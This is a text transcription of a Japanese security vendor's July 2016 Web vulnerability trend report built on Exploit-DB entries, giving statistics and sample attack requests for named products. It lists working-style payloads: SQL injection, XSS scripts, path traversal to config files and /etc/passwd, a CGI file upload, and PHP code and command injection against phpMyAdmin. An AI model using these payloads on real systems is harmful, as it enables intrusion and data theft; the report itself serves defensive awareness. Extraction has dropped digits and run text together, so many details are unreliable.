サマリー EDB-Report 最新 Web 脆弱性トレンドレポート (06.07) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデー

Save this PDF as:
 WORD  PNG  TXT  JPG

Size: px
Start display at page:

Download "サマリー EDB-Report 最新 Web 脆弱性トレンドレポート (06.07) ~ Exploit-DB(http://exploit-db.com) より公開されている内容に基づいた脆弱性トレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデー"

Transcription

1 06.07

2 サマリー EDB-Report 最新 Web 脆弱性トレンドレポート (06.07) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 7 月に公開された Exploit-DB の分析結果 クロスサイトスクリプティング (Cross Site Scripting) 攻撃に対する脆弱性の報告件数が最も多く 攻撃パターンも多様に発見されました 該当脆弱性は 一般的に発生するクロスサイトスクリプティング (Cross Site Scripting) 脆弱性ではなく 特定プログラム上でのみ発生する脆弱性がほとんどでした 主なソフトウェア別脆弱性発生の現況を見ると から最も多い脆弱性が発見されました (* で発見された脆弱性は 自体の問題ではなく 特定 Plug-in を使う際に発生し得る脆弱性がほとんどです ) 該当脆弱性は Parameter の Value に挿入される形式であり また特定な header を狙う脆弱性でした 脆弱性が発見されたプログラムや Plug-in を使用する管理者はアップデート事項の確認及び早急なアップデートが求められます. 脆弱性別件数脆弱性カテゴリ コマンドインジェクション (Command Injection) コード インジェクション (Code Injection) ファイルアップロード (File Upload) ローカルファイル挿入 (Local File Inclusion:LFI) 件数 SQL インジェクション 9 (SQL Injection) クロスサイトスクリプティング (Cross Site Scripting : 5 XSS) 合計 脆弱性別件数 危険度別分類危険度 件数 割合 早急対応要 6.67% 高 % 合計 % 危険度別分類 8 早急対応要 高 3. 攻撃実行の難易度別件数難易度 件数 割合 難 6.67% 中 % 易 70.00% 合計 % 攻撃実行の難易度別件数 7 難 中 易 4. 主なソフトウェア別脆弱性発生件数 ソフトウェア名 件数 IPS Community Suite CodoForum Tiki Wiki PaKnPost Django PhpMyAdmin PHP File Vault Joomla php Real Estate Script Streamo 合計 30 主なソフトウェア別脆弱性発生件数 IPS Community Suite CodoForum Tiki Wiki PaKnPost Django PhpMyAdmin PHP File Vault Joomla php Real Estate Script

3 最新 Web 脆弱性トレンドレポート (06.07) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です SQL Injection 易高 index.php SQL Injection 脆弱性 /ecardmaxdemo/admin/index.php?step=admin_sho w_keyword&what=&row_number=0%0order% 0by%0--&search_year=06&page= SQL Injection 中高 Billing /admin/aomanage.php?search=&cat=status%0u System () NION%0select%0,,3,version%8%9,5,curre aomanage.php SQL Injection 脆 nt_user,7,8,9,0,,,3,4,5,6,7,8,9,0, 弱性 --&list=3&so=status' () SQL Injection 難早急対応要 Photostore /photostore/gallery/objects/4/ page/ SQL Injection 脆弱性 POST / HTTP/. Chrome/ Safari/535.7 postgalleryform=&gallerysortby=media_id&gallery SortType=asc,(SELECT 973 FROM(SELECT COUNT(*),CONCAT(0x776b6b7,(SELECT (ELT(973=973,))),0x778777,FLOOR(RAND (0)*))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Photostore XSS 易高 index.php XSS 脆弱性 /ecardmaxdemo/admin/index.php?step=admin_me mber_display&search_field=all&keyword=%3cscript %3Ealert()%3C%Fscript%3E&cmd_button=Sear ch+user XSS 易高 Photostore workbox.php XSS 脆弱性 /photostore/workbox.php?mode=addtolightbox& mediaid= ><script>alert(/xss/)</script> Photostore XSS 易高 Photostore mgr.login.php XSS 脆弱性 /photostore/manager/mgr.login.php?username=de mo&password='><script>alert("xss")</script><input type='hidden Photostore SQL Injection 中高 Billing System () hostingarchiveadmin.php SQL Injection 脆弱性 # /admin/hostingarchiveadmin.php?search=&cat=sta tus UNION select --&list=&so=status' ().9.

4 最新 Web 脆弱性トレンドレポート (06.07) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です File Upload 易高 PaKnPost Pro.4 - select_.cgi File Upload 脆弱性 POST /cgi-bin/pnp/select_.cgi?sid=../../../cgi-bin/ HTTP/. Connection: CloseAccept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0) Content-Type: multipart/form-data; boundary= dd009908f PaKnPost PaKnPost Pro dd009908f Content-Disposition: form-data; name="file"; filename="pnp-test.txt.cgi" Content-Type: application/octet-stream dd009908f XSS 中高 Billing System () cmanage.php XSS 脆弱性 POST /admin/cmanage.php HTTP/. Chrome/ Safari/535.7 ().9. reason=%%3e%3cscript%3ealert%8%9% 3C%Fscript%3E XSS 中高 Billing System () helpdesk.php XSS 脆弱性 POST /admin/helpdesk.php HTTP/. Chrome/ Safari/535.7 ().9. hd_name="><script>alert()</script> XSS 中高 Billing System () omanage.php XSS 脆弱性 /omanage.php?search=%%3e%3cscript%3eal ert%83%9%3c/script%3e&cat=status%%3e %3Cscript%3Ealert%84%9%3C/script%3E&list =4%%3E%3Cscript%3Ealert%8%9%3C/scr ipt%3e&so=status%%3e%3cscript%3ealert% 8%9%3C/script%3E () XSS 易高 serverserver-settings.jsp XSS 脆弱性 POST /serverserver-settings.jsp HTTP/. Chrome/ Safari/ < 4.0. domain=%%f%3e%3cscript%3ealert%8% 7XSS%7%9%3C%Fscript%3E&remotePort=5 69&serverAllowed=Add+Server XSS 易高 /plugins/search/advance-usersearch.jsp?search=true&moreoptions=false&criteria advance-user-search.jsp XSS 脆 =admin%/%3e%3cscript%3ealert%8%7xss 弱性 %7%9%3C/script%3E&search=Search 3.0. < XSS 易高 POST /muc-service-edit-form.jsp HTTP/. Chrome/ Safari/ mucservice-edit-form.jsp XSS 脆弱性 3.0. < 4.0. save=true&mucname=test&mucdesc=test%%f %3E%3Cscript%3Ealert%8%7XSS- %7%9%3C%Fscript%3E

5 最新 Web 脆弱性トレンドレポート (06.07) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です XSS 易高 POST /plugins/search/search-props-edit-form.jsp HTTP/ Chrome/ Safari/535.7 search-props-edit-form.jsp XSS 脆弱性 3.0. < 4.0. searchenabled=true&searchname=%/%3e%3cs cript%3ealert('xss')%3c/script%3e&grouponly=fa lse XSS 易高 /groupsummary.jsp?search=test%+onmouseover%3dal group-summary.jsp XSS 脆弱性 ert%8%7xss%7%9+x%3d% 3.0. < XSS 易高 POST /wp-content/plugins/real3dflipbook/includes/flipbooks.php HTTP/. Real3D FlipBook Chrome/ Safari/535.7 Plugin - flipbooks.php XSS 脆弱 性 Real3D FlipBook Plugin action=delete&bookid=<script>alert(/makman/)</scr ipt> SQL Injection 難高 /programs.php?id= %7%0union%0all %0select%0concat%80x7e%C0x7%Cunhe Streamo Online Radio And TV x%8hex%8cast%8database%8%9%0as% Streaming CMS - programs.php 0char%9%9%9%C0x7%C0x7e%9%C SQL Injection 脆弱性 0x %0and%0%7x% 7%3D%7x Streamo Streamo Online Radio And TV Streaming CM LFI 易高 POST /admin/ajax_cms/get_template_content/ HTTP/. php Real Estate Script 3 - /admin/ajax_cms/get_template Chrome/ Safari/535.7 _content/ LFI 脆弱性 php Real Estate Script php Real Estate Script 3 tpl=../../private/config/db.php GET / HTTP/ XSS 易 高 All in One SEO Pack P User-Agent: Abonti </pre><script>alert();</script> All in One SEO Pack Plugin LFI 易高 Tiki Wiki CMS flv_stream.php LFI 脆弱性 /player/flv/flv_stream.php?file=../../../db/local.php& position=0 Tiki Wiki Tiki Wiki CMS 5.0 /index.php?app=core&module=system&controller= Code Injection 易 高 IPS Community Suite incontent&do=find&content_class=cms\fields{}phpi nfo();/* IPS IPS Community Suite Community Suite 4...3

6 最新 Web 脆弱性トレンドレポート (06.07) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です XSS 易 高 POST /wp-login.php HTTP/. Chrome/ Safari/535.7 Activity Log Plugin. X-Forwarded-For: <script>alert(document.cookie);</script> Activity Log Plugin.3. log=wordpress&pwd=sdsdssdsdsd&wpsubmit=log+in&redirect_to=http%3a%f%f %Fwp-admin%F&testcookie= SQL Injection 易高 Joomla Guru Pro (com_guru) Component - index.php SQL Injection 脆弱性 /index.php?option=com_guru&view=gurupcategs&l ayout=view&itemid=%0and%0=--&lang=en Joomla Joomla Guru Pro (com_guru) Component SQL Injection 中 高 POST /wp-admin/adminajax.php?action=spiderveideoplayerselectplaylist HTTP/. Chrome/ Safari/535.7 Video Player Plugin Video Player Plugin.5. search_events_by_title=&page_number=0serch_or_n ot=&asc_or_desc=&order_by=(case WHEN (SELECT sleep(0)) = THEN id ELSE title END) ASC #&option=com_spider_video_player&task=select_pl aylist&boxchecked=0&filter_order_playlist=&filter_or der_dir_playlist= POST /index.php HTTP/. Content-Type: multipart/form-data; boundary= dd009908f XSS 易高 dd009908f Content-Disposition: form-data; name="to_field" Django CMS /en/admin/djangocms_snippet/ id snippet// XSS 脆弱性 dd009908f Content-Disposition: form-data; name="name" Django Django CMS test <img src="x">%0%0>"<iframe src="a">%0<iframe> "><"<img src="x">%0%0>"<iframe src=a><script>alet();</script><iframe> dd009908f SQL Injection 中高 CodoForum index.php SQL Injection 脆弱性 /forum/index.php?u=/user/profile/%0and%0( SELECT%0*(IF((SELECT%0*%0FROM%0(SE LECT%0CONCAT((MID((IFNULL(CAST(CURRENT_U SER()%0AS%0CHAR),0x0)),,45))))s),% ,% ))) CodoForum CodoForum LFI 易高 PHP File Vault /htdocs/fileinfo.php LFI 脆弱性 /htdocs/fileinfo.php?sha=..%f..%f..%f..%f..%f..%fetc%fpasswd PHP File Vault PHP File Vault 0.9

7 最新 Web 脆弱性トレンドレポート (06.07) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です SQL Injection 易高 Ultimate Product Catalog (do_shortcode via ajax) Blind SQL Injection POST /wordpress/wp-admin/adminajax.php?action=update_catalogue HTTP/. Chrome/ Safari/535.7 Ultimate Product Catalog id=+or+sleep(0) Command Injection 易 早急対応要 POST /tbl_find_replace.php HTTP/. Chrome/ Safari/535.7 PhpMyAdmin tbl_find_rep PhpMyAdmin PhpMyAdmin 4.6. replacewith=system('uname -a');

最新 Web トレンドレポート (06.04) ~ Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 4

最新 Web トレンドレポート (06.04) ~ Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 4 06.04 最新 Web トレンドレポート (06.04) 06.04.0~06.04.0 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 4 月公開された Exploit-DB の分析結果 クロスサイトスクリプティング (Cross

More information

EDB-Report 最新Web脆弱性トレンドレポート(5.4) 5.4.~5.4.3 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です ペンタセキュリティシステムズ株式会社R&Dセンター データセキュリティチーム サマリー 5

EDB-Report 最新Web脆弱性トレンドレポート(5.4) 5.4.~5.4.3 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です ペンタセキュリティシステムズ株式会社R&Dセンター データセキュリティチーム サマリー 5 5.4 EDB-Report 最新Web脆弱性トレンドレポート(5.4) 5.4.~5.4.3 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です ペンタセキュリティシステムズ株式会社R&Dセンター データセキュリティチーム サマリー 5年4月は Exploit-DBの分析結果をみると SQLインジェクション攻撃による脆弱性が最も多く報告されました

More information

最新 Web トレンドレポート (06.03) ~ Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 3

最新 Web トレンドレポート (06.03) ~ Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 3 06.03 最新 Web トレンドレポート (06.03) 06.03.0~06.03.3 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 3 月に公開された Exploit-DB の分析結果 Local File Inclusion

More information

itechclassifieds Middle School Horizon QCMS myseatxt 0.34 Joomla JV Comment PizzaInn_Project XOS Simple e-document Taboada Macronews godontologico 5 E

itechclassifieds Middle School Horizon QCMS myseatxt 0.34 Joomla JV Comment PizzaInn_Project XOS Simple e-document Taboada Macronews godontologico 5 E 04.0 itechclassifieds Middle School Horizon QCMS myseatxt 0.34 Joomla JV Comment PizzaInn_Project XOS Simple e-document Taboada Macronews godontologico 5 EDB-Report 最 新 Web 脆 トレンドレポート(04.0) 04.0.0~04.0.3

More information

Copyright 2006 Mitsui Bussan Secure Directions, Inc. All Rights Reserved. 3 Copyright 2006 Mitsui Bussan Secure Directions, Inc. All Rights Reserved.

Copyright 2006 Mitsui Bussan Secure Directions, Inc. All Rights Reserved. 3 Copyright 2006 Mitsui Bussan Secure Directions, Inc. All Rights Reserved. 2006 12 14 Copyright 2006 Mitsui Bussan Secure Directions, Inc. All Rights Reserved. 2 Copyright 2006 Mitsui Bussan Secure Directions, Inc. All Rights Reserved. 3 Copyright 2006 Mitsui Bussan Secure Directions,

More information

最新 Web トレンドレポート (07.0) ~07.0. Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 07 年 月に公開さ

最新 Web トレンドレポート (07.0) ~07.0. Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 07 年 月に公開さ 07.0 最新 Web トレンドレポート (07.0) 07.0.0~07.0. Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 07 年 月に公開された Exploit-DB の脆弱報告件数は 平均的に 他の期間の数よりも 4 倍ほど多かったです

More information

サマリー EDB-Report 最新 Web トレンドレポート (06.0) ~ Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチー

サマリー EDB-Report 最新 Web トレンドレポート (06.0) ~ Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチー 06.0 サマリー EDB-Report 最新 Web トレンドレポート (06.0) 06.0.0~06.0.3 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 0 月に公開された Exploit-DB の分析結果 SQL インジェクション攻撃に対する脆弱報告件数が最も多く

More information

CNO2009_Enquete_Report.key

CNO2009_Enquete_Report.key 1 2 55% 45% 3 3 3 25 2 22 15 16 1 5 7 8 5 1 1 2 2 3 3 4 4 Web Web Web 1 3 3 3 3 14 15 17 27 5 1 15 2 25 3 5 1 1 6 6 41 42 1 2 3 4 5 6 CSS Nite mixi mixi 21 5 9 5 1 4 1 12 16 12 7 6 12 18 24 3 7 7 6 5 4

More information

Web のクライアントサーバモデル

Web のクライアントサーバモデル 第 2 回の内容 クライアントサーバモデル URI HTTP Web のクライアントサーバモデル クライアントサーバモデル ユーザークライアントサーバ 処理要求の入力 処理要求 結果の提示 処理結果 処理 Web のクライアントサーバモデル ユーザー Web ブラウザ Web サーバ URI の指示 HTTP リクエスト Web ページの描画 HTTP レスポンス URI Web ブラウザのアドレスバー

More information

Flash Player ローカル設定マネージャー

Flash Player ローカル設定マネージャー ADOBE FLASH PLAYER http://help.adobe.com/ja_jp/legalnotices/index.html iii................................................................................................................. 1...........................................................................................................

More information

「諸雑公文書」整理の中間報告

「諸雑公文書」整理の中間報告 30 10 3 from to 10 from to ( ) ( ) 20 20 20 20 20 35 8 39 11 41 10 41 9 41 7 43 13 41 11 42 7 42 11 41 7 42 10 4 4 8 4 30 10 ( ) ( ) 17 23 5 11 5 8 8 11 11 13 14 15 16 17 121 767 1,225 2.9 18.7 29.8 3.9

More information

Microsoft PowerPoint - webapp.ppt [互換モード]

Microsoft PowerPoint - webapp.ppt [互換モード] 一 般 的 なWebアクセス Webサーバ バ レスポンス HTML ファイル HTTPリクエスト 画 像 ファイル Webブラウザ あらかじめ 用 意 されたリソースしか 提 供 できない Webアプリケーション Webサーバ バ レスポンス HTTPリクエスト HTML Webブラウザ ページを 動 的 に 生 成 プログラム 実 行 データベース 操 作 Webアプリケーション 掲 示 板 検

More information

2012研究摘要(23年度).doc

2012研究摘要(23年度).doc .. 0 23 18 BMB FTP 14 22 Internal Server Error 500.htaccess 14 50 Web BMB Internal Server Error 500 BMB 15 20 BMB BMB facebook twitter Facebook BMB phpmyadmin php Thumbs.db.htaccess 1 PHP phpmyadmin phpmyadmin

More information

操作1 <設問作成>

操作1 <設問作成> ORCA (Online Research Control system Architecture) ORCA 1 1 2 3 4 5 6 7 URL 2 [ ] 3 4 5 1. 2. 4 6 2. 4. 3. 5. 7 6. 8.10. 9. 12. 13. 14. 8 2. 4. 3. 5. 6. 8. 7. 9. 9 9. 10 8. 12. 9. 10. 11 6. 8. 7. 8. 6

More information

WordPress Web

WordPress Web 0948011 1 1 1.............................. 1 2 WordPress....................... 2 3........................ 3 4........................ 4 2 4 1 Web......... 4 3 5 1 WordPress...................... 5 2..........................

More information

388-356697252-2.pdf

388-356697252-2.pdf 専修大学 ネットワーク情報学部 2012年度 特殊演習 (Webプログラミング) 新居雅行 / Masayuki Nii 2 HTML/CSS 2012 4 23 1 2-1 Web 2 2-1 80 SSL Apache WindowsIIS Internet Information Server HTTP HyperText Transfer Protocol HTML HTML 1 1 [ URI]

More information

<834A8358835E837D83438359837D836A83858341838B2D30312E6169>

<834A8358835E837D83438359837D836A83858341838B2D30312E6169> 01 1 2 3 4 02 03 1 2 3 4 5 6 7 8 9 10 11 12 13 1 2 3 4 5 6 7 8 9 10 11 12 13 04 1 2 1 2 3 3 05 06 01 02 03 04 01 02 03 04 05 SITE Web Site Welcome to my home page. SITE Web Site Welcome to my home page.

More information

スライド 1

スライド 1 Monthly Research WordPress の 脆 弱 性 を 狙 った Web 改 ざん 攻 撃 株 式 会 社 FFRI http://www.ffri.jp Ver 1.00.02 1 はじめに 近 年 の Web 改 ざんは マルウェア 感 染 を 目 的 としたものが 主 流 であったが ここ 数 年 では 主 義 主 張 の 顕 示 を 目 的 とする 改 ざんも 再 び 目

More information

4.11 4 55 4.12 11 56 4.13 0 57 4.14 1 58 4.15 4 59 4.16 11 60 5 5.1 5.1 5.2 1 (1983) Q = K A I v = Q / A = K I v = v / o n o Q A L 3 T -1 I : K : LT -1 v LT -1 v LT -1 o n o 61 (3) 5.3 1 5.1 K=10-1 10-3

More information

shio_20041004.PDF

shio_20041004.PDF JPNIC JPCERT/CC 2004 Web 2004 10 4 Web Web Web WASC Web Application Security Consortium 7 Web Security Threat Classification Web URL 2 ...?? It depends!? It depends!??? 3 ? It depends!...

More information

WordPress Ktai Style Ktai Entry 18 Mac 18

WordPress Ktai Style Ktai Entry 18 Mac 18 WORDPRESS 2011 8 27 (8 31 ) WordBeach Nagoya WordBench WordPress Ktai Style Ktai Entry 18 Mac 18 http://www.yuriko.net/ @lilyfanjp PHP WordPress ( ) WordPress function the_content($more_link_text=null,$stripteaser=0,

More information

p64大倉.pdf

p64大倉.pdf Web Web 1 17 GP 19 2 GP 2 18 GP 17 Web 17 2007 18 4 2. 1 1 GP OK 2 3 4GP 5 2. 2 1 4 2 3 2. 3 1 2GP 3 2. 4 19 GP GP GP PC GP or or Web 2007 1 3 1 LAN 2 CDDVD 3 3 3. 1 17 18 19 50 3. 2 2 3. 3 Web 4 2 2 3.

More information

会社説明資料(平成28年7月28日 広島)

会社説明資料(平成28年7月28日 広島) (9035) Company Information 28728 2 3 4 5 7 23 27 33 39 41 50 54 65 3 35624 12426(:9035) 202,75519,613,600(1:100) (57) 1222 34160 15,000() 4 34 9,120 5 120,000 12,000 110,000 100,000 110,016 103,000 11,000

More information

Microsoft Word - Live Meeting Help.docx

Microsoft Word - Live Meeting Help.docx 131011 101919 161719 19191110191914 11191417 101919 1915101919 Microsoft Office Live Meeting 2007 191714191412 1913191919 12 151019121914 19151819171912 17191012151911 17181219 1610121914 19121117 12191517

More information

07_経営論集2010 小松先生.indd

07_経営論集2010 小松先生.indd 19 1 2009 105 123 Web Web Web Web World Wide Web WWW OS 1990 WWW Web HTML CSS JavaScript Web 1 WWW 2 Web Web 3 Web 4 HTML5 5 Web Web 3 1970 WWW HTML Web WWW WWW WWW WWW WWW 105 Web WWW 2 Web 1 1 NTT NTT

More information

PowerPoint Presentation

PowerPoint Presentation 77 78 79 1.0strict 2.1 Xhtml1.1 Xhtml1.1 Xhtml1.0strict 80 81 82 83 84 85 86 87 Enter( 88 html html Flash FLASH Enter(html 89 html (html html (flash 90 91 92 93 // 94 95 96 MB CMS 97 14159,000html 15166,000

More information

untitled

untitled 1 3 2 4 3 4 4 4 5 5 6 6 1 7 2 7 3 9 4 9 1 11 2 11 3 11 4 12 5 13 6 17 7 17 8 17 1 18 2 18 3 18 4 19 5 20 6 21 7 21 8 21 1 22 2 25 3 31 2 3 4 5 2004 4 1 6 7 8 9 10 11 12 13 / Gas Assist Injection 14 15

More information

Web Web ( (SOAP (SOAP/http (WSDL UDDI 1. 2.XML 3. (XDoS http, https SOAP XML Web/App ( App

Web Web ( (SOAP (SOAP/http (WSDL UDDI 1. 2.XML 3. (XDoS http, https SOAP XML Web/App ( App Web 2005 12 15 XML Day XML matsu@kabuki.tel.co.jp 2005 1 1 Web Web Web 2005 2 2 Web 2005 3 3 Web ( (SOAP (SOAP/http (WSDL UDDI 1. 2.XML 3. (XDoS http, https SOAP XML Web/App ( App 2005 4 4 SOAP Crypto-Gram

More information

untitled

untitled 25 10 12 11 24 (1) 14 (2) 26 10 44 (3) (4) (5) 27 10 68 (6) (7) (8) 25 10 ( ) (1) (2) (3) ) city.yokohama.lg.jp city.yokohama.jp WEB WEB WEB WEB WEB WEB 1 25 10 WEB WEB (1) (2) (3) (4) 25 10 (1) WEB (2)

More information

スマートコネクト マネージドサーバ WAFオプション仕様書

スマートコネクト マネージドサーバ WAFオプション仕様書 スマートコネクト マネージドサーバ WAF オプション 仕 様 書 ( 第 1.0 版 2015 年 6 月 22 日 版 ) < 目 次 > スマートコネクト マネージドサーバ WAF オプション 1. WAF オプション 概 要... 2 1.1. オプション 概 要... 2 1.2. オプション 特 徴... 2 2. WAF オプション 仕 様... 3 2.1. オプション 提 供 プラン...

More information

no

no 12 2004.9.3. no.234 2004.9.3. no.234 13 14 2004.9.3. no.234 2004.9.3. no.234 15 16 2004.9.3. no.234 2004.9.3. no.234 17 18 2004.9.3. no.234 19 2004.9.3. no.234 20 2004.9.3. no.234 21 2004.9.3. no.234 22

More information

... 2 1 Servlet... 3 1.1... 3 1.2... 4 2 JSP... 6 2.1... 6 JSP... 6... 8 2.2... 9 - Servlet/JSP における 日 本 語 の 処 理 - 1

... 2 1 Servlet... 3 1.1... 3 1.2... 4 2 JSP... 6 2.1... 6 JSP... 6... 8 2.2... 9 - Servlet/JSP における 日 本 語 の 処 理 - 1 Servlet/JSP Creation Date: Oct 18, 2000 Last Update: Mar 29, 2001 Version: 1.1 ... 2 1 Servlet... 3 1.1... 3 1.2... 4 2 JSP... 6 2.1... 6 JSP... 6... 8 2.2... 9 - Servlet/JSP における 日 本 語 の 処 理 - 1 Servlet

More information

<4D6963726F736F667420506F776572506F696E74202D209574985E814683418376838A8350815B83568387839382D682CC91E3955C93498D558C822E707074>

<4D6963726F736F667420506F776572506F696E74202D209574985E814683418376838A8350815B83568387839382D682CC91E3955C93498D558C822E707074> 付 録 アプリケーションへの 代 表 的 攻 撃 (SQL)インジェクション データベースを 利 用 するアプリケーションに 対 して 外 部 からの 入 力 で 不 正 に データベースを 操 作 参 照 する 手 法 入 力 がSQL 以 外 のシステムのコマンド 等 として 処 理 される 場 合 に それらを 利 用 する コマンドインジェクションなども 類 似 の 攻 撃 パラメータ 改

More information

自己紹介 はせがわようすけ ネットエージェント株式会社 株式会社セキュアスカイ テクノロジー技術顧問 OWASP Kansai Chapter Leader OWASP Japan Chapter Advisory Board member

自己紹介 はせがわようすけ ネットエージェント株式会社 株式会社セキュアスカイ テクノロジー技術顧問  OWASP Kansai Chapter Leader OWASP Japan Chapter Advisory Board member HTML5 のセキュリティ もうちょい詳しく HTML5 セキュリティその 3 : JavaScript API Jun 6 2014 Yosuke HASEGAWA 自己紹介 はせがわようすけ ネットエージェント株式会社 株式会社セキュアスカイ テクノロジー技術顧問 http://utf-8.jp/ OWASP Kansai Chapter Leader OWASP Japan Chapter Advisory

More information

28 2016 24 4 16-1 - KuniJiban XML Windows7 10 Google Chrome MS-IE 11 Mozilla Firefox iphone6 Safari URL http://geonews.zenchiren.or.jp/api/2016kumamotoeq/index.html http://www.web-gis.jp/2016kumamotoeq/index.html

More information

FileMaker WebDirect Guide

FileMaker WebDirect Guide FileMaker 13 WebDirect 2014 FileMaker, Inc. All Rights Reserved. FileMaker, Inc. 5201 Patrick Henry Drive Santa Clara, California 95054 FileMaker Bento FileMaker, Inc. FileMaker WebDirect Bento FileMaker,

More information

¥Í¥Ã¥È¥ï¡¼¥¯¥×¥í¥°¥é¥ß¥ó¥°ÆÃÏÀ

¥Í¥Ã¥È¥ï¡¼¥¯¥×¥í¥°¥é¥ß¥ó¥°ÆÃÏÀ 6 : JavaScript 2 : Web Web HTTPS : Web : Web, Internet Week 1 / 23 2 / 23 Web Web : HTTP: ( ) TCP: IP: ( ) Web 3 / 23 Basic (base64 ) ( ) Digest md5 Basic (nonce) hidden

More information

1 2 1.1................................ 2 1.2................................. 2 1.2.1............................... 3 1.2.2.........................

1 2 1.1................................ 2 1.2................................. 2 1.2.1............................... 3 1.2.2......................... 18 PHP Ajax 1 2 1.1................................ 2 1.2................................. 2 1.2.1............................... 3 1.2.2................................... 3 2 7 2.1.......................

More information

Microsoft Project Project 1984 No.1 Project PMBOK (Project Management Body of Knowledge) 1 2 ( ) 3 3 Project 3 Project Standard/Professional Office Pr

Microsoft Project Project 1984 No.1 Project PMBOK (Project Management Body of Knowledge) 1 2 ( ) 3 3 Project 3 Project Standard/Professional Office Pr Microsoft Project 2015 4 Microsoft Project Project 1984 No.1 Project PMBOK (Project Management Body of Knowledge) 1 2 ( ) 3 3 Project 3 Project Standard/Professional Office Project Standard Project Professional

More information

2

2 from One 1 2 24 2 3 4 30 4 5 47 13 6 7 34 2 13 8 34.................................. 9 15-1-5 15-1-4 10 11 12 12 13 14 15 A ( 1) A A 2 B B 16 2 2 17 3 C C 18 3 19 ( ) 15 2 5 ( 56 2 16 20 2 5 ) (1) (2)

More information

Webアプリケーション脆弱性診断 ~WebSiteScan Pro~

Webアプリケーション脆弱性診断 ~WebSiteScan Pro~ エヌシーアイ Webアプリケーション 脆 弱 性 診 断 について ~WebSiteScan~ エヌシーアイ 株 式 会 社 の Webアプリケーション 脆 弱 性 診 断 とは? エヌシーアイ 株 式 会 社 のWebアプリケーション 診 断 とは WEBサイト 新 設 もしくはリニューア ル 時 のセキュリティ 診 断 として 広 くご 利 用 頂 いております SaaS 型 サービスの 為 お

More information

Installation and New Features Guide for FileMaker Pro 10 and FileMaker Pro 10 Advanced

Installation and New Features Guide for FileMaker Pro 10 and FileMaker Pro 10 Advanced FileMaker FileMaker Pro 10 and FileMaker Pro 10 Advanced 2007-2009 FileMaker, Inc. All rights reserved. FileMaker, Inc. 5201 Patrick Henry Drive Santa Clara, California 95054 FileMaker Bento Bento FileMaker,

More information

PowerPoint プレゼンテーション

PowerPoint プレゼンテーション スパイラルAPI 目 次 スパイラルAPI 1. スパイラルAPI 全 体 像 システム 構 成 2. APIトークンとAPIトークンシークレット 3. APIトークンとAPIトークンシークレットの 発 行 4. APIとして 提 供 しているメソッド APIにてデータ 取 得 可 能 なスパイラル 機 能 3 4 5 6 5. 認 証 (マイエリア) メソッド 一 覧 対 照 表 6. 一 覧 表

More information

Hadoop Introduction

Hadoop Introduction Hadoop Introduction はじめに Agenda Hadoopおさらい 1 HadoopStreaming 2 Hive 3 Demo (Apacheログ解析) 4 5 まとめ Hadoop の概要 Hadoop の特徴 Hadoop クラスタ構成 マスターサーバ バッチの進捗状況管理 Map/Reduce タスク割振り NameNode JobTracker HDFS 管理 DataNode

More information

女王陛下のイザベラ・バード

女王陛下のイザベラ・バード 1878( 11) 5 9 47 ( ) (151cm) ( ) 135 1831 10 1 1819 1837 1901 1904 72 22 7 3 2000 (1856 ) J (1875 ) 1873 40 4000m 1870 ( ) (1877) 11 2 9 17 C J 18 19 1869 1872 (1859 ) 1872( 5) J (1879 ) C J 10 3 11 J

More information

SOC Report

SOC Report HTTP Status Code Pollution N T T コ ミ ュ ニ ケ ー シ ョ ン ズ株式会社 ソリューションサービス部 第四エンジニアリング部門 セ キ ュ リ テ ィ オ ペ レ ー シ ョ ン担当 2012 年 06 月 15 日 Ver. 1.0 1. 調査概要... 3 1.1. 調査概要... 3 2. HTTP RESPONSE の STATUS CODE 汚染...

More information

DM 10010

